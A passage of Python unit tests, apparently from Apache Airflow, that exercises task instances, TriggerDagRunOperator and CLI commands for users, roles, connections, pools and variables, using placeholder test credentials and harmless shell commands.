arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)), '\u1000foo')
self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date, utc_now)
def test_trigger_dagrun_with_str_execution_date(self):
utc_now_str = timezone.utcnow().isoformat()
self.assertIsInstance(utc_now_str, (str,))
run_id = 'trig__' + utc_now_str
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now_str,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date.isoformat(), utc_now_str)
def test_trigger_dagrun_with_templated_execution_date(self):
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
execution_date='{{ execution_date }}',
dag=self.dag)
self.assertTrue(isinstance(task.execution_date, str))
self.assertEqual(task.execution_date, '{{ execution_date }}')
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.render_templates()
self.assertEqual(timezone.parse(task.execution_date), DEFAULT_DATE)
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class CliTests(unittest.TestCase):
TEST_USER1_EMAIL = 'test-user1@example.com'
TEST_USER2_EMAIL = 'test-user2@example.com'
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._cleanup()
def setUp(self):
super().setUp()
from airflow.www import app as application
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
for email in [self.TEST_USER1_EMAIL, self.TEST_USER2_EMAIL]:
test_user = self.appbuilder.sm.find_user(email=email)
if test_user:
self.appbuilder.sm.del_register_user(test_user)
for role_name in ['FakeTeamA', 'FakeTeamB']:
if self.appbuilder.sm.find_role(role_name):
self.appbuilder.sm.delete_role(role_name)
super().tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(Pool).delete()
session.query(Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test'
])
cli.users(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
args = self.parser.parse_args([
'users', '-d', '--username', 'test3',
])
cli.users(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'users', '-c', '--username', 'user{}'.format(i), '--lastname',
'doe', '--firstname', 'jon',
'--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
'--use_random_password'
])
cli.users(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.users(self.parser.parse_args(['users', '-l']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_import_users(self):
def assertUserInRoles(email, roles):
for role in roles:
self.assertTrue(self._does_user_belong_to_role(email, role))
def assertUserNotInRoles(email, roles):
for role in roles:
self.assertFalse(self._does_user_belong_to_role(email, role))
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Admin", "Op"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Public"]
}
]
self._import_users_from_file(users)
assertUserInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Public'])
users = [
{
"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]
},
{
"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]
}
]
self._import_users_from_file(users)
assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
assertUserInRoles(self.TEST_USER1_EMAIL, ['Public'])
assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
assertUserInRoles(self.TEST_USER2_EMAIL, ['Admin'])
def test_cli_export_users(self):
user1 = {"username": "imported_user1", "lastname": "doe1",
"firstname": "jon", "email": self.TEST_USER1_EMAIL,
"roles": ["Public"]}
user2 = {"username": "imported_user2", "lastname": "doe2",
"firstname": "jon", "email": self.TEST_USER2_EMAIL,
"roles": ["Admin"]}
self._import_users_from_file([user1, user2])
users_filename = self._export_users_to_file()
with open(users_filename, mode='r') as file:
retrieved_users = json.loads(file.read())
os.remove(users_filename)
# ensure that an export can be imported
self._import_users_from_file(retrieved_users)
def find_by_username(username):
matches = [u for u in retrieved_users
if u['username'] == username]
if not matches:
self.fail("Couldn't find user with username {}".format(username))
else:
matches[0].pop('id') # this key not required for import
return matches[0]
self.assertEqual(find_by_username('imported_user1'), user1)
self.assertEqual(find_by_username('imported_user2'), user2)
def _import_users_from_file(self, user_list):
json_file_content = json.dumps(user_list)
f = NamedTemporaryFile(delete=False)
try:
f.write(json_file_content.encode())
f.flush()
args = self.parser.parse_args([
'users', '-i', f.name
])
cli.users(args)
finally:
os.remove(f.name)
def _export_users_to_file(self):
f = NamedTemporaryFile(delete=False)
args = self.parser.parse_args([
'users', '-e', f.name
])
cli.users(args)
return f.name
def _does_user_belong_to_role(self, email, rolename):
user = self.appbuilder.sm.find_user(email=email)
role = self.appbuilder.sm.find_role(rolename)
if user and role:
return role in user.roles
return False
def test_cli_add_user_role(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should not yet be a member of role 'Op'"
)
args = self.parser.parse_args([
'users', '--add-role', '--username', 'test4', '--role', 'Op'
])
cli.users(args)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Op'),
"User should have been added to role 'Op'"
)
def test_cli_remove_user_role(self):
args = self.parser.parse_args([
'users', '-c', '--username', 'test4', '--lastname', 'doe',
'--firstname', 'jon',
'--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
])
cli.users(args)
self.assertTrue(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been created with role 'Viewer'"
)
args = self.parser.parse_args([
'users', '--remove-role', '--username', 'test4', '--role', 'Viewer'
])
cli.users(args)
self.assertFalse(
self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
rolename='Viewer'),
"User should have been removed from role 'Viewer'"
)
@mock.patch("airflow.bin.cli.DagBag")
def test_cli_sync_perm(self, dagbag_mock):
self.expect_dagbag_contains([
DAG('has_access_control',
access_control={
'Public': {'can_dag_read'}
}),
DAG('no_access_control')
], dagbag_mock)
self.appbuilder.sm = mock.Mock()
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
assert self.appbuilder.sm.sync_roles.call_count == 1
self.assertEqual(2,
len(self.appbuilder.sm.sync_perm_for_dag.mock_calls))
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'has_access_control',
{'Public': {'can_dag_read'}}
)
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'no_access_control',
None,
)
def expect_dagbag_contains(self, dags, dagbag_mock):
dagbag = mock.Mock()
dagbag.dags = {dag.dag_id: dag for dag in dags}
dagbag_mock.return_value = dagbag
def test_cli_create_roles(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', '--create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_create_roles_is_reentrant(self):
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
args = self.parser.parse_args([
'roles', '--create', 'FakeTeamA', 'FakeTeamB'
])
cli.roles(args)
cli.roles(args)
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_list_roles(self):
self.appbuilder.sm.add_role('FakeTeamA')
self.appbuilder.sm.add_role('FakeTeamB')
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.roles(self.parser.parse_args(['roles', '-l']))
stdout = mock_stdout.getvalue()
self.assertIn('FakeTeamA', stdout)
self.assertIn('FakeTeamB', stdout)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
def test_cli_list_jobs(self):
args = self.parser.parse_args(['list_jobs'])
cli.list_jobs(args)
def test_cli_list_jobs_with_args(self):
args = self.parser.parse_args(['list_jobs', '--dag_id',
'example_bash_operator',
'--state', 'success',
'--limit', '100'])
cli.list_jobs(args)
@mock.patch("airflow.bin.cli.db.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with()
@mock.patch("airflow.bin.cli.db.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with()
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['hive_cli_default', 'hive_cli'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(Connection)
.filter(Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_parentdag_downstream_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator.section-1', '--no_confirm',
'--exclude_parentdag'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator',
'-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as file:
json.dump(pool_config_input, file)
# Import json
try:
cli.pool(self.parser.parse_args(['pool', '-i', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool -i pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool(self.parser.parse_args(['pool', '-e', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool -e pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as file:
pool_config_output = json.load(file)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Set a dict
cli.variables(self.parser.parse_args([
'variables', '-s', 'dict', '{"foo": "oops"}']))
# Set a list
cli.variables(self.parser.parse_args([
'variables', '-s', 'list', '["oops"]']))
# Set str
cli.variables(self.parser.parse_args([
'variables', '-s', 'str', 'hello string']))
# Set int
cli.variables(self.parser.parse_args([
'variables', '-s', 'int', '42']))
# Set float
cli.variables(self.parser.parse_args([
'variables', '-s', 'float', '42.0']))
# Set true
cli.variables(self.parser.parse_args([
'variables', '-s', 'true', 'true']))
# Set false
cli.variables(self.parser.parse_args([
'variables', '-s', 'false', 'false']))
# Set none
cli.variables(self.parser.parse_args([
'variables', '-s', 'null', 'null']))
# Export and then import
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables3.json']))
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables3.json']))
# Assert value
self.assertEqual({'foo': 'oops'}, models.Variable.get('dict', deserialize_json=True))
self.assertEqual(['oops'], models.Variable.get('list', deserialize_json=True))
self.assertEqual('hello string', models.Variable.get('str')) # cannot json.loads(str)
self.assertEqual(42, models.Variable.get('int', deserialize_json=True))
self.assertEqual(42.0, models.Variable.get('float', deserialize_json=True))
self.assertEqual(True, models.Variable.get('true', deserialize_json=True))
